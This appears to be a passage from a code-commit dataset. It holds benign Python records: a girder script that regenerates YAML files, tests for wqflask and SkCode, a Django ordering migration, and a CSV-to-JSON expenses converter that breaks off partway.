listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
<commit_before><commit_msg>Add script for regenerating yaml files<commit_after>import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
|
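Two small hardening points for the script above, sketched rather than prescribed: yaml.safe_load avoids constructing arbitrary Python objects from the data files, and context managers guarantee the file handles are closed. The helper names are mine; the paths follow the original layout.

import os
import yaml

def read_yaml(root, name):
    with open(os.path.join(root, '_data', name)) as fh:
        return yaml.safe_load(fh)

def write_yaml(root, name, data):
    with open(os.path.join(root, '_data', name), 'w') as fh:
        yaml.dump(data, fh)

# e.g. server_paths = read_yaml(rsl_page_root, 'notebooks.yaml')
#      write_yaml(rsl_page_root, 'simulations.yaml', simulation_data)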
4d16656304b9702c124721e82ea0dcda3c40ae44
|
wqflask/tests/wqflask/test_collect.py
|
wqflask/tests/wqflask/test_collect.py
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
Add test for process_traits from collections.py
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.
|
Python
|
agpl-3.0
|
zsloan/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
<commit_before><commit_msg>Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.<commit_after>
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it."""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
<commit_before><commit_msg>Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.<commit_after>"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
|
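The expected output in the test above implies that, for a logged-out user, process_traits keeps only the first two colon-separated fields of each trait token and drops the trailing hash. A minimal re-implementation of that contract (not the actual wqflask code) can be checked the same way:

def strip_trait_hashes(traits):
    """Drop the trailing hash from 'name:dataset:hash' tokens."""
    tokens = traits.decode('utf-8').split(',')
    return {':'.join(t.split(':')[:2]) for t in tokens}

assert strip_trait_hashes(
    b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
    b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5') == {
        '1452452_at:HC_M2_0606_P', '1429252_at:HC_M2_0606_P'}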
6fcbdd225b3f7f47bd481ea63d7487b08c549625
|
src/apps/dive_log/migrations/0003_auto_20150131_0946.py
|
src/apps/dive_log/migrations/0003_auto_20150131_0946.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
Migrate sort order of datapoints
|
Migrate sort order of datapoints
|
Python
|
mit
|
GotlingSystem/apnea,GotlingSystem/apnea
|
Migrate sort order of datapoints
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
<commit_before><commit_msg>Migrate sort order of datapoints<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
Migrate sort order of datapoints# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
<commit_before><commit_msg>Migrate sort order of datapoints<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
|
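AlterModelOptions only touches model state, so the migration above corresponds to a Meta change on the DataPoint model along these lines (a reconstruction from the options dict, not the actual apnea source; the field name 'second' is taken from the ordering key):

from django.db import models

class DataPoint(models.Model):
    second = models.IntegerField()

    class Meta:
        ordering = ['second']
        verbose_name = 'Datapunkt'
        verbose_name_plural = 'Datapunkter'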
e5a6329d5be5d570d43feabe2c3e58a0b86ae9b3
|
tests/tests_tags/tests_electronic.py
|
tests/tests_tags/tests_electronic.py
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
Add tests suite for electronic NOT tag.
|
Add tests suite for electronic NOT tag.
|
Python
|
agpl-3.0
|
TamiaLab/PySkCode
|
Add tests suite for electronic NOT tag.
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
<commit_before><commit_msg>Add tests suite for electronic NOT tag.<commit_after>
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
Add tests suite for electronic NOT tag."""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
<commit_before><commit_msg>Add tests suite for electronic NOT tag.<commit_after>"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
|
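The expected strings in the tests pin down what the NOT-notation tag must emit: an uppercased span with a CSS overline in HTML, and a '/NAME' form in plain text. A standalone sketch of those two render rules, independent of the skcode tag machinery, looks like this:

def render_not_html(inner):
    # CSS overline is the usual way to draw the electronics NOT bar
    return ('<span style="text-decoration:overline; '
            'text-transform: uppercase;">%s</span>' % inner)

def render_not_text(inner):
    # plain-text convention: a leading slash, name uppercased
    return '/' + inner.upper()

assert render_not_text('reset') == '/RESET'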
f04fe3f19efc7fb01c7b2dc9cd09f329ca404c12
|
utils/csv-to-json.py
|
utils/csv-to-json.py
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
Convert OSH expense data CSV to JSON
|
Convert OSH expense data CSV to JSON
|
Python
|
apache-2.0
|
cartland/octavia-street-hilton,cartland/octavia-street-hilton,cartland/octavia-street-hilton
|
Convert OSH expense data CSV to JSON
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
<commit_before><commit_msg>Convert OSH expense data CSV to JSON<commit_after>
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
Convert OSH expense data CSV to JSONimport argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
<commit_before><commit_msg>Convert OSH expense data CSV to JSON<commit_after>import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
